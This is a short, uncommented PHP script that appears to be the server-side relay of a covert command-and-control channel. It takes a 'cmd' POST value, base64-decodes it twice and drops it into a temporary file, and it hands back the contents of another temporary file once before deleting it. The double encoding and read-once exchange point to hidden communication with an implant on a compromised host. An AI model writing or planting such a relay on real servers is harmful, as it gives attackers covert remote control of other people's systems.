<?php

if(isset($_POST['cmd']))
{
unlink('output.tmp');
$out=base64_decode(base64_decode($_POST['cmd']));
file_put_contents('output.tmp',$out);
}
else
{

	if(file_exists('input.tmp'))
	{
	echo file_get_contents('input.tmp');
	unlink('input.tmp');
	}

}

?>